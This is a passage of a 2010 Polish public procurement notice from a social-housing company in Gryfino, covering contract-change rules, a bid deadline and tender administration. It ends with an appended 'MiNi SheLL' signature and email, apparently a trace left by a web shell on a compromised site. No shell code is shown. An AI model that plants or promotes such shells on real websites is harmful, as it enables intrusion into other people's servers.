4.3. W przypadku gdy określone w p.4. 2 zmiany   powodują wzrost kosztów inwestycji traktuje się je    jako roboty dodatkowe i  zamawiający musi    udzielić zamówienia dodatkowego ich wykonanie, w    trybie wynikającym z art.67 ust 1 pkt. 5 ustawy pzp
5. Zmiana kolejności wykonania elementów robót
Na pisemny wniosek oraz za zgodą zamawiającego dopuszcza się zmianę kolejności wykonania elementów robót. Wniosek o zmianę kolejności wykonania robót musi zawierać propozycję zmiany harmonogramu wykonywania elementów robót.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.tbs.gryfino.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gryfińskie Towarzystwo Budownictwa Społecznego Spółka z o.o.
 ul. Grunwaldzka 1 , 74-100 Gryfino.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.09.2010 godzina 11:00, miejsce: Gryfińskie Towarzystwo Budownictwa Społecznego Spółka z o.o.
 ul. Grunwaldzka 1 , 74-100 Gryfino.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com